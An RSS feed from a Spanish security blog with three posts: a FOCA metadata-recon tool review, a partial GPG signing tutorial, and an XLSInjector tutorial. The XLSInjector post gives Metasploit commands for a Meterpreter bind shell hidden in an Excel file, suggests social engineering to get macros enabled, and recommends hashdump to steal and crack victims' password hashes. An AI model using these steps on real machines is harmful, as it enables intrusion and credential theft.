<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>La Comunidad DragonJAR &#187; Documentos</title> <atom:link href="http://www.dragonjar.org/tag/documentos/feed" rel="self" type="application/rss+xml" /><link>http://www.dragonjar.org</link> <description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description> <lastBuildDate>Sat, 11 Feb 2012 22:13:24 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>FOCA &#8211; Herramienta para análisis de Meta Datos</title><link>http://www.dragonjar.org/foca-herramienta-para-analisis-meta-datos.xhtml</link> <comments>http://www.dragonjar.org/foca-herramienta-para-analisis-meta-datos.xhtml#comments</comments> <pubDate>Mon, 17 Oct 2011 18:52:13 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Chema Alonso]]></category> <category><![CDATA[Documentos]]></category> <category><![CDATA[Extraer]]></category> <category><![CDATA[Fingerprinting]]></category> <category><![CDATA[FOCA]]></category> <category><![CDATA[impresora]]></category> <category><![CDATA[Informatica64]]></category> <category><![CDATA[Meta Datos]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[PDF]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4200</guid> <description><![CDATA[FOCA, Es increíble pensar que llevo bastante tiempo utilizando la FOCA y nunca le había dedicado un artículo a este animal, a pesar de haber publicado varias charlas de Chema Alonso donde daba a conocer su mascota. ¿Que es la FOCA? FOCA (Llamado así en honor a Francisco OCA, aunque luego buscaran las siglas &#8220;Fingerprinting [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2011/02/FOCA.jpg" width="240" title="FOCA   Herramienta para análisis de Meta Datos" alt="FOCA FOCA   Herramienta para análisis de Meta Datos" /></p><p><span
style="text-decoration: underline;"><a
href="http://www.dragonjar.org/tag/foca" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con FOCA">FOCA</a></span>, Es increíble pensar que llevo bastante tiempo utilizando la <strong>FOCA</strong> y nunca le había dedicado un artículo a este animal, a pesar de haber publicado varias charlas de <a
href="http://www.dragonjar.org/tag/chema-alonso" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Chema Alonso">Chema Alonso</a> donde daba a conocer su mascota.</p><p
style="text-align: center;"><a
href="http://www.dragonjar.org/wp-content/uploads/2011/02/FOCA1.jpg"><img
class="aligncenter size-full wp-image-7810" title="FOCA" src="http://www.dragonjar.org/wp-content/uploads/2011/02/FOCA1.jpg" alt="FOCA1 FOCA   Herramienta para análisis de Meta Datos" width="500" height="99" /></a></p><h2>¿Que es la FOCA?</h2><p><em>FOCA</em> (<a
href="http://elladodelmal.blogspot.com/2008/11/criando-una-foca.html" rel="nofollow" target="_blank"><em>Llamado así en honor a Francisco OCA, aunque luego buscaran las siglas &#8220;Fingerprinting Organizations with Collected Archives&#8221;</em></a>) es una herramienta para encontrar Metadatos e información oculta en <a
href="http://www.dragonjar.org/tag/documentos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Documentos">documentos</a> de <a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a> Office, Open Office y documentos <a
href="http://www.dragonjar.org/tag/pdf" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PDF">PDF</a>/PS/EPS, <a
href="http://www.dragonjar.org/tag/extraer" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Extraer">extraer</a> todos los datos de ellos exprimiendo los ficheros al máximo y una vez extraídos cruzar toda esta información para obtener datos relevantes de una empresa.<span
id="more-4200"></span></p><h2>¿Que funciones tiene la FOCA?</h2><p>La foca hace Google y Bing <a
href="http://www.dragonjar.org/tag/hacking" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Hacking">Hacking</a> para descubrir los archivos ofimáticos que tiene un dominio, los descarga masivamente, les extrae los metadatos, organiza los datos y nos muestra la siguiente información:</p><ul><li>Nombres de usuarios del sistema</li><li>Rutas de archivos</li><li>Versión del Software utilizado</li><li>Correos electrónicos encontrados</li><li>Fechas de Creación, Modificación e Impresión de los documentos.</li><li>Sistema operativo desde donde crearon el documento</li><li>Nombre de las impresoras utilizadas</li><li>Permite descubrir subdominios y mapear la red de la organización</li><li>Nombres e IPs descubiertos en Metadatos</li><li>Búsqueda de nombres de dominio en Web: Google o Bing [Interfaz web o API]</li><li>Búsqueda de registros Well-Known en servidor DNS</li><li>Búsqueda de nombres comunes en servidor DNS</li><li>Búsqueda de IPs con resolución DNS</li><li>Búsqueda de nombres de dominio con BingSearch ip</li><li>Búsqueda de nombres con PTR Scanning del segmento de red con DNS interno</li><li>Transferencia de Zonas</li><li>Detección automática de DNS Cache</li><li>Vista de Roles</li><li>Filtro de criticidad en el log</li><li>Entre otras muchas cosas&#8230;</li></ul><p>Ahora en la versión 3.0 los chicos de <a
href="http://www.dragonjar.org/tag/informatica64" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Informatica64">Informatica64</a> han dado un nuevo aire a la herramienta, cambiando completamente su interface, añadiendo nuevas funcionalidades, en fin&#8230; les dejo el listado de cambios, con los respectivos enlaces para que analices cada uno en profundidad:</p><ul><li><a
href="http://www.elladodelmal.com/2011/07/foca-30-el-re-styling-de-la-foca.html" rel="nofollow" target="_blank">Re-styling del interfaz</a>.</li><li><a
href="http://www.elladodelmal.com/2011/05/foca-27-preview-parte-1.html" rel="nofollow" target="_blank">Panel de tareas multi-hilo</a>.</li><li><a
href="http://www.elladodelmal.com/2011/06/foca-27-preview-parte-2.html" rel="nofollow" target="_blank">Búsqueda de puertos de squid proxy</a>.</li><li><a
href="http://www.elladodelmal.com/2011/05/foca-27-preview-parte-1.html" rel="nofollow" target="_blank">Búsqueda de registros de servicio en DNS</a>.</li><li>Búsqueda de políticas anti-spam del dominio [SPF, DKIM, Domainkey]</li><li><a
href="http://www.elladodelmal.com/2011/06/foca-27-preview-parte-2.html" rel="nofollow" target="_blank">Búsqueda de ficheros ICA y RDP</a>: Usuarios, software en ellos y adición rol de RemoteApp.</li><li><a
href="http://www.elladodelmal.com/2011/09/mas-sobre-foca-3.html" rel="nofollow" target="_blank">Análisis de .DS_Store</a></li><li><a
href="http://www.elladodelmal.com/2011/09/mas-sobre-foca-3.html" rel="nofollow" target="_blank">Análisis de Robots.txt</a></li><li><a
href="http://www.elladodelmal.com/2011/09/mas-sobre-foca-3.html" rel="nofollow" target="_blank">Integración de Shodan y Robtex en el algoritmo</a></li><li><a
href="http://www.elladodelmal.com/2011/09/mas-sobre-foca-3.html" rel="nofollow" target="_blank">Análisis de Leaks [Solo en versión PRO]</a></li><li><a
href="http://www.elladodelmal.com/2011/09/mas-sobre-foca-3.html" rel="nofollow" target="_blank">Análisis de errores de aplicación</a></li><li><a
href="http://www.elladodelmal.com/2011/09/mas-sobre-foca-3.html" rel="nofollow" target="_blank">Ampliación de tecnologías</a></li></ul><p>La foca es especialmente útil, en la tarea previa a un pen-test, donde debemos recolectar toda la información posible sobre el objetivo para que nuestra tarea se realice de la mejor forma.<br
/> Aquí podemos ver a Chema mostrando su FOCA, durante su charla en el VI Congreso Latinoamericano de Respuesta a Incidentes de Seguridad (Colaris), realizado en Perú.</p><p
style="text-align: center;"><iframe
title="YouTube video player" src="http://www.youtube.com/embed/Xx8ESYfbpRU" frameborder="0" width="580" height="356"></iframe></p><p>O este pequeño manual básico de instalación y uso creado por <a
href="http://comunidad.dragonjar.org/members/cruz4d3r/" rel="nofollow" target="_blank">cruz4d3r</a> para la comunidad en una versión anterior de la foca (pero aún vigente).</p><p
style="text-align: center;"><iframe
title="YouTube video player" src="http://www.youtube.com/embed/aNucTrEWfSM" frameborder="0" width="580" height="356"></iframe></p><h2 style="text-align: center;"><a
href="http://www.informatica64.com/descargas/Foca_Free_3_0_20111027.zip" rel="nofollow" target="_blank">Descargar la FOCA 3</a></h2><p><strong>Más Información:</strong><br
/> <a
href="http://www.informatica64.com/DownloadFOCA/" rel="nofollow" target="_blank">Pagina Oficial de la FOCA</a><br
/> <a
href="http://www.informatica64.com/foca/" rel="nofollow" target="_blank">Versión Online de la FOCA</a><br
/> <a
href="http://elladodelmal.blogspot.com/search/label/FOCA" rel="nofollow" target="_blank">La Página del Maligno, donde habla siempre de su FOCA</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/memorias-del-asegurit-7.xhtml" title="Memorias del Asegúr@IT 7">Memorias del Asegúr@IT 7</a></li><li><a
href="http://www.dragonjar.org/entrevista-a-chema-alonso.xhtml" title="Entrevista a Jose Maria &#8220;Chema&#8221; Alonso para La Comunidad DragonJAR">Entrevista a Jose Maria &#8220;Chema&#8221; Alonso para La Comunidad DragonJAR</a></li><li><a
href="http://www.dragonjar.org/eisi-iii-dia-2.xhtml" title="Tercer Encuentro Internacional de Seguridad Informática – Día II">Tercer Encuentro Internacional de Seguridad Informática – Día II</a></li><li><a
href="http://www.dragonjar.org/kriptdoc.xhtml" title="KriptDoc">KriptDoc</a></li><li><a
href="http://www.dragonjar.org/nmap-5-0.xhtml" title="NMap 5.50">NMap 5.50</a></li><li><a
href="http://www.dragonjar.org/como-funcionan-y-se-crackean-las-claves-en-sistemas-windows.xhtml" title="Cómo funcionan y se crackean las claves en sistemas Windows">Cómo funcionan y se crackean las claves en sistemas Windows</a></li><li><a
href="http://www.dragonjar.org/dilemas-de-la-seguridad-en-el-desarrollo-de-software.xhtml" title="Dilemas de la seguridad en el desarrollo de software">Dilemas de la seguridad en el desarrollo de software</a></li><li><a
href="http://www.dragonjar.org/actualiza-tu-software-con-secunia-personal-software-inspector.xhtml" title="Actualiza tu software con Secunia Personal Software Inspector ">Actualiza tu software con Secunia Personal Software Inspector </a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/foca-herramienta-para-analisis-meta-datos.xhtml/feed</wfw:commentRss> <slash:comments>12</slash:comments> </item> <item><title>XLSInjector &#8211; Inyectar Shell Meterpreter en Archivos Excel</title><link>http://www.dragonjar.org/xlsinjector-inyectar-shell-meterpreter-archivos-excel.xhtml</link> <comments>http://www.dragonjar.org/xlsinjector-inyectar-shell-meterpreter-archivos-excel.xhtml#comments</comments> <pubDate>Thu, 26 Nov 2009 02:31:56 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Pentest]]></category> <category><![CDATA[consola]]></category> <category><![CDATA[Documentos]]></category> <category><![CDATA[Ejecución]]></category> <category><![CDATA[meterpreter]]></category> <category><![CDATA[microsoft excel]]></category> <category><![CDATA[Shell]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3433</guid> <description><![CDATA[Para nadie es un secreto que la suite ofimática mas utilizada en el mundo es Microsoft Office, que se lleva la mayor parte de la cuota de mercado en entornos Windows y Mac, de esta suite, las aplicaciones mas utilizadas son Microsoft Word, Microsoft Excel y Microsoft Power Point que casi siempre están instaladas en [...]]]></description> <content:encoded><![CDATA[<p>Para nadie es un secreto que la suite ofimática mas utilizada en el mundo es <a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a> Office, que se lleva la mayor parte de la cuota de mercado en entornos Windows y Mac, de esta suite, las aplicaciones mas utilizadas son <a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a> Word, <a
href="http://www.dragonjar.org/tag/microsoft-excel" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con microsoft excel">Microsoft Excel</a> y Microsoft Power Point que casi siempre están instaladas en la mayoría de computadores.</p><p>En esta ocasión les voy a hablar sobre <a
href="http://code.google.com/p/xlsinjector/">XLSInjector</a>, una herramienta creada en perl por <a
style="white-space: nowrap;" href="http://code.google.com/u/keith.lee2012/">keith lee</a> que permite inyectar en un archivo XLS de Microsoft Excel una <a
href="http://www.dragonjar.org/tag/consola" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con consola">consola</a> <a
href="http://www.dragonjar.org/tag/meterpreter" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con meterpreter">meterpreter</a> (ejecutando todo en la memoria ram sin crear procesos adicionales), permitiéndonos acceder a el remotamente por el puerto 4444 y tomar total control de la maquina.</p><p
style="text-align: center;"><img
class="alignnone" title="Shell en Microsoft Excel" src="http://farm3.static.flickr.com/2504/4141619399_6369cd84b7.jpg" alt="4141619399 6369cd84b7 XLSInjector   Inyectar Shell Meterpreter en Archivos Excel" width="357" height="172" /></p><p>Para que XLSInjector funcione adecuadamente, necesitamos lo siguiente:</p><ul><li>Una Maquina (virtual o real) con Windows</li><li>Microsoft Excel</li><li><a
href="http://www.activestate.com/activeperl/">Perl</a></li><li>El modulo <a
href="http://search.cpan.org/CPAN/authors/id/J/JD/JDB/Win32-OLE-0.1709.tar.gz">Win32:OLE</a> para Perl</li><li>Un archivo XML a infectar</li><li>El <a
href="http://code.google.com/p/xlsinjector/">XLSInjector</a></li><li>y por ultimo el <a
href="http://www.metasploit.com/">Metasploit Framework</a></li></ul><p>Después de tener todos los elementos necesarios para el correcto funcionamiento del XLSInjector pasamos a su <a
href="http://www.dragonjar.org/tag/ejecucion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Ejecución">ejecución</a>, que es bastante simple:<span
id="more-3433"></span></p><p><code>perl xlsinjector.pl -i ArchivoDeExcel.xls  -o ArchivoConShellDeExcel.xls</code></p><p>Pero no todo es tan simple con esta herramienta, resulta que XLSInjector NO salta los filtros de scripting puestos por Microsoft en su suite ofimática, por lo que toca convencer, por medio de ingeniería social o cualquier otra técnica que el mismo usuario ponga la seguridad de las macros en baja y que &#8220;confié&#8221; en los proyectos de VB, algo complicado pero que seguro con algo de presunción se consigue que realicen estas tareas.</p><p>Suponiendo que ya se realizaron las configuraciones adecuadas para el correcto funcionamiento del XLSInjector vamos a acceder remotamente a nuestra <a
href="http://www.dragonjar.org/tag/shell" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Shell">shell</a> meterpreter mediante la consola del Metasploit Framework</p><ul><li>iniciamos la consola del metasploit</li><li>una vez en la consola de MSF cargamos el payload de meterpreter<br
/> <code>set payload windows/meterpreter/bind_tcp</code></li><li>lo configuramos adecuadamente<br
/> <code>set RHOST ipdelpcvictima<br
/> set RPOT 4444</code></li><li>luego lo lanzamos<br
/> <code>exploit</code></li></ul><p>Con estos simples pasos tenemos a nuestra disposición una shell meterpreter en el equipo remoto, hay que recordar que las shell meterpreter son diferentes a las del sistema operativo, y tienen su propio listado de comandos, puedes sacar el listado de comandos disponibles para la shell meterpreter escribiendo &#8220;?&#8221; y enter, te arrojara algo parecido a esto:</p><blockquote><p><code>Core Commands<br
/> =============</code></p><p><code>Command       Description<br
/> ——-       ———–<br
/> ?             Help menu<br
/> channel       Displays information about active channels<br
/> close         Closes a channel<br
/> exit          Terminate the meterpreter session<br
/> help          Help menu<br
/> interact      Interacts with a channel<br
/> irb           Drop into irb scripting mode<br
/> migrate       Migrate the server to another process<br
/> quit          Terminate the meterpreter session<br
/> read          Reads data from a channel<br
/> run           Executes a meterpreter script<br
/> use           Load a one or more meterpreter extensions<br
/> write         Writes data to a channel</code></p><p><code>Stdapi: File system Commands<br
/> ============================</code></p><p><code>Command       Description<br
/> ——-       ———–<br
/> cat           Read the contents of a file to the screen<br
/> cd            Change directory<br
/> download      Download a file or directory<br
/> edit          Edit a file<br
/> getlwd        Print local working directory<br
/> getwd         Print working directory<br
/> lcd           Change local working directory<br
/> lpwd          Print local working directory<br
/> ls            List files<br
/> mkdir         Make directory<br
/> pwd           Print working directory<br
/> rmdir         Remove directory<br
/> upload        Upload a file or directory</code></p><p><code>Stdapi: Networking Commands<br
/> ===========================</code></p><p><code>Command       Description<br
/> ——-       ———–<br
/> ipconfig      Display interfaces<br
/> portfwd       Forward a local port to a remote service<br
/> route         View and modify the routing table</code></p><p><code>Stdapi: System Commands<br
/> =======================</code></p><p><code>Command       Description<br
/> ——-       ———–<br
/> execute       Execute a command<br
/> getpid        Get the current process identifier<br
/> getuid        Get the user that the server is running as<br
/> kill          Terminate a process<br
/> ps            List running processes<br
/> reboot        Reboots the remote computer<br
/> reg           Modify and interact with the remote registry<br
/> rev2self      Calls RevertToSelf() on the remote machine<br
/> shutdown      Shuts down the remote computer<br
/> sysinfo       Gets information about the remote system, such as OS</code></p><p><code>Stdapi: User interface Commands<br
/> ===============================</code></p><p><code>Command       Description<br
/> ——-       ———–<br
/> idletime      Returns the number of seconds the remote user has been idle<br
/> uictl         Control some of the user interface components</code></p><p><code>Priv: Password database Commands<br
/> ================================</code></p><p><code>Command       Description<br
/> ——-       ———–<br
/> hashdump      Dumps the contents of the SAM database</code></p><p><code>Priv: Timestomp Commands<br
/> ========================</code></p><p><code>Command       Description<br
/> ——-       ———–<br
/> timestomp     Manipulate file MACE attributes </code></p></blockquote><p>Hay que resaltar la potencia de meterpreter para inyectar dll’s, subir ficheros, ejecutar scripts, te recomiendo que le des una leída a estos <a
href="http://www.dragonjar.org/tag/documentos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Documentos">documentos</a> (<a
href="http://www.nologin.org/Downloads/Papers/meterpreter.pdf">Meterpreter.pdf</a> y <a
href="http://www.learnsecurityonline.com/vid/MSF3-met/MSF3-met.html">MSF3-met.html</a>) para que aprendas mas sobre los comandos del meterpreter.</p><p>Te recomiendo utilizar el comando <code>migrate</code> tan pronto puedas para evitar que tan pronto cierren el archivo XLS se cierre con el tu shell, otro comando recomendado es <code>hashdump</code> que te arroja el contenido del archivo SAM en la maquina victima para que posteriormente puedas obtener la <a
href="http://www.dragonjar.org/tag/clave" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Clave">clave</a> de los usuarios con herramientas como <a
href="http://www.l0phtcrack.com/">l0phtcrack</a> o <a
href="http://www.oxid.it/cain.html">cain&amp;abel</a>.</p><p>Por ultimo les dejo el video del autor, donde nos enseña el funcionamiento del XLSInjector</p><p
id="preview" style="text-align: center;"><object
id="player" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="640" height="564" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param
name="name" value="player" /><param
name="flashvars" value="file=http://videos.securitytube.net/Injecting-Meterpreter-into-Excel-files-using-XLSInjector.mp4" /><param
name="src" value="http://miliw0rm.securitytube.net/player.swf" /><param
name="allowfullscreen" value="true" /><param
name="quality" value="high" /><embed
id="player" type="application/x-shockwave-flash" width="640" height="564" src="http://miliw0rm.securitytube.net/player.swf" quality="high" allowfullscreen="true" flashvars="file=http://videos.securitytube.net/Injecting-Meterpreter-into-Excel-files-using-XLSInjector.mp4" name="player"></embed></object></p><p><script src="http://miliw0rm.securitytube.net/swfobject.js" type="text/javascript"></script><script type="text/javascript">// <![CDATA[
   var s1 = new SWFObject('http://miliw0rm.securitytube.net/player.swf','player','640','564','9'); s1.addParam('allowfullscreen','true'); s1.addParam('allowscriptaccess','always'); s1.addParam('flashvars','file=http://<a href="http://www.dragonjar.org/tag/videos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Videos">videos</a>.securitytube.net/Injecting-Meterpreter-into-Excel-files-using-XLSInjector.mp4'); s1.write('preview');
// ]]&gt;</script></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/manual-en-espanol-de-meterpreter.xhtml" title="Manual en español de Meterpreter">Manual en español de Meterpreter</a></li><li><a
href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a
href="http://www.dragonjar.org/foca-herramienta-para-analisis-meta-datos.xhtml" title="FOCA &#8211; Herramienta para análisis de Meta Datos">FOCA &#8211; Herramienta para análisis de Meta Datos</a></li><li><a
href="http://www.dragonjar.org/ipad-wiimote-consola-arcade-portable.xhtml" title="iPad + Wiimote = Consola Arcade Portable">iPad + Wiimote = Consola Arcade Portable</a></li><li><a
href="http://www.dragonjar.org/como-descubrir-vulnerabilidades-y-escribir-exploits.xhtml" title="Cómo descubrir vulnerabilidades y escribir exploits">Cómo descubrir vulnerabilidades y escribir exploits</a></li><li><a
href="http://www.dragonjar.org/la-vida-en-modo-texto-ii.xhtml" title="La vida en modo texto II">La vida en modo texto II</a></li><li><a
href="http://www.dragonjar.org/la-vida-en-modo-texto-i.xhtml" title="La vida en modo texto I">La vida en modo texto I</a></li><li><a
href="http://www.dragonjar.org/google-por-linea-de-comandos.xhtml" title="Google por linea de comandos">Google por linea de comandos</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/xlsinjector-inyectar-shell-meterpreter-archivos-excel.xhtml/feed</wfw:commentRss> <slash:comments>6</slash:comments> <enclosure
url="http://videos.securitytube.net/Injecting-Meterpreter-into-Excel-files-using-XLSInjector.mp4" length="7702120" type="video/mp4" /> </item> <item><title>Firmando Documentos y Correos con GPG</title><link>http://www.dragonjar.org/firmando-documentos-y-correos-con-gpg.xhtml</link> <comments>http://www.dragonjar.org/firmando-documentos-y-correos-con-gpg.xhtml#comments</comments> <pubDate>Sun, 26 Jul 2009 02:49:16 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Cifrar]]></category> <category><![CDATA[Clave]]></category> <category><![CDATA[Documentos]]></category> <category><![CDATA[GNU]]></category> <category><![CDATA[GPG]]></category> <category><![CDATA[pgp]]></category> <category><![CDATA[Proteger]]></category> <category><![CDATA[Pública]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=2843</guid> <description><![CDATA[Muchas veces en nuestra vida cotidiana o nuestro trabajo, necesitamos que la informacion que enviamos por medios electrónicos no sean visto por terceras personas, para esto es necesario que utilicemos conexiones seguras y que cifremos nuestra informacion, en el siguiente articulo creado por Seifreed nos explica como realizar el firmado y cifrado de documentos con [...]]]></description> <content:encoded><![CDATA[<p>Muchas veces en nuestra vida cotidiana o nuestro trabajo, necesitamos que la informacion que enviamos por medios electrónicos no sean visto por terceras personas, para esto es necesario que utilicemos conexiones seguras y que cifremos nuestra informacion, en el siguiente articulo creado por <a
rel="nofollow" href="http://comunidad.dragonjar.org/members/seifreed/">Seifreed</a> nos explica como realizar el firmado y cifrado de <a
href="http://www.dragonjar.org/tag/documentos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Documentos">documentos</a> con <a
href="http://www.dragonjar.org/tag/gpg" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con GPG">GPG</a> (<a
href="http://www.dragonjar.org/tag/gnu" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con GNU">GNU</a> Privacy Guard) el reemplazo libre del <a
href="http://www.dragonjar.org/tag/pgp" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con pgp">PGP</a> (Pretty Good Privacy).</p><p
style="text-align: center;"><img
src="http://farm4.static.flickr.com/3526/3759778385_ba3dd4bceb_o.jpg" alt="3759778385 ba3dd4bceb o Firmando Documentos y Correos con GPG"  title="Firmando Documentos y Correos con GPG" /></p><p>Es increíble como avanzan las tecnologías cada vez mas, hemos de <a
href="http://www.dragonjar.org/tag/proteger" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Proteger">proteger</a> y verificar que la información que enviamos y recibimos es la correcta.<span
id="more-2843"></span></p><h2><strong>Objetivo:</strong></h2><blockquote><p>Poder firmar correos y documentos y verificar la integridad.</p></blockquote><p>Por eso, hoy explicaré como firmar los correos y los documentos con GPG.<br
/> Empezaremos con explicar que es GPG.</p><blockquote><p
style="text-align: justify;"><strong>GPG</strong> o <strong>G</strong>NU <strong>P</strong>rivacy <strong>G</strong>uard es una herramienta para cifrado y firmas digitales, que viene a ser un reemplazo del PGP (<em>Pretty Good Privacy</em>) pero con la principal diferencia que es software libre licenciado bajo la GPL. GPG utiliza el estándar del IETF denominado OpenPGP.</p></blockquote><p>Muy bien y que es PGP?</p><blockquote><p
style="text-align: justify;"><strong>Pretty Good Privacy</strong> o <strong>PGP</strong> (<em>privacidad bastante buena</em>) es un programa desarrollado por Phil Zimmermann y cuya finalidad es proteger la información distribuida a través de Internet mediante el uso de criptografía de <a
href="http://www.dragonjar.org/tag/clave" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Clave">clave</a> <a
href="http://www.dragonjar.org/tag/publica" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Pública">pública</a>, así como facilitar la autenticación de documentos gracias a firmas digitales.</p><p
style="text-align: justify;">PGP originalmente fue diseñado y desarrollado por Phil Zimmermann en 1991. El nombre está inspirado en el del colmado <em>Ralph’s Pretty Good Grocery</em> de Lake Wobegon, una ciudad ficticia inventada por el locutor de radio Garrison Keillor.</p></blockquote><p>Si queréis mas información podéis visitar los enlaces en la Wikipedia, <a
title="GNU_Privacy_Guard" onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_es_wikipedia_org_wiki_GNU_Privacy_Guard');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://es.wikipedia.org/wiki/GNU_Privacy_Guard" target="_blank">GNU_Privacy_Guard</a> y <a
onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_');" rel="nofollow" href="http://anonym-url.com/go.php?to=http:///" target="_blank">PGP</a>.</p><h2><a
href="http://www.dragonjar.org/tag/cifrar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Cifrar">Cifrar</a> Correos y Documentos con GPG en Windows</h2><p>Comencemos instalando GPG en Windows.<br
/> Nos vamos a la página oficial de <a
onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_www_gpg4win_org_');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.gpg4win.org/" target="_blank">GPG para Windows</a>.<br
/> Como podéis ver en el centro de la página pone Download. Si le damos nos llevará a la zona de descargas.<br
/> También podemos ir manualmente poniendo en el navegador la dirección.<br
/> <a
onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_www_gpg4win_org_');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.gpg4win.org/" target="_blank">Zona de descargas para GPG</a><br
/> Nos hemos de descargar la primera opción que nos sale.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://seifreed.files.wordpress.com/2009/07/descargando.png?w=500&amp;h=271" border="0" alt=" Firmando Documentos y Correos con GPG"  title="Firmando Documentos y Correos con GPG" /></p><p>Donde pone gpg4win-1.1.4 9.5M.<br
/> Una vez bajado empezamos a instalarlo.<br
/> Es una instalación de Windows. Es decir siguiente, siguiente hasta acabar. Sólo nos hemos de fijar en UNO de los pasos</p><p
style="text-align: center;"><img
class="aligncenter" src="http://seifreed.files.wordpress.com/2009/07/instalacion.png?w=500&amp;h=388" border="0" alt=" Firmando Documentos y Correos con GPG"  title="Firmando Documentos y Correos con GPG" /></p><p>Sólo necesitaremos lo que hay marcado para instalar. Instalar mas es consumir espacio para nada.<br
/> Una vez se haya instalado nos vamos al programa para generar nuestra clave.<br
/> Picamos encima del icono.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://seifreed.files.wordpress.com/2009/07/iconos.png?w=44&amp;h=56" border="0" alt=" Firmando Documentos y Correos con GPG"  title="Firmando Documentos y Correos con GPG" /></p><p>Y nos saldrá una pantalla como esta:</p><p
style="text-align: center;"><img
class="aligncenter" src="http://seifreed.files.wordpress.com/2009/07/creando_llaves.png?w=294&amp;h=187" border="0" alt=" Firmando Documentos y Correos con GPG"  title="Firmando Documentos y Correos con GPG" /></p><p>Aquí nos ofrece tres opciones:</p><ol
style="list-style-type: decimal;"><li>Generar nuestras llaves. Opción que escojeremos.</li><li>Copiar otras llaves ya generadas de alguna carpeta.</li><li>Generar un par de llaves para una SmartCard</li></ol><p>Escogemos la primera que es la que necesitamos. Le damos a OK. Sigamos con la siguiente pantalla:</p><p
style="text-align: center;"><img
class="aligncenter" src="http://seifreed.files.wordpress.com/2009/07/creando_llaves_2.png?w=413&amp;h=327" border="0" alt=" Firmando Documentos y Correos con GPG"  title="Firmando Documentos y Correos con GPG" /></p><p>Aqui le pondremos la información a nuestra clave privada. Nuestro nombre y la dirección de correo a la que pertenecerá esta dirección de correo. Le damos a OK.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://seifreed.files.wordpress.com/2009/07/creando_llaves_3.png?w=355&amp;h=168" border="0" alt=" Firmando Documentos y Correos con GPG"  title="Firmando Documentos y Correos con GPG" /></p><p><strong>Es muy importante recordar esta contraseña.</strong> Ya que será con la que firmaremos <strong>todos los correos y documentos.</strong><br
/> Metemos la clave dos veces, y empezará el proceso de creación de la clave.</p><p
style="text-align: center;"><img
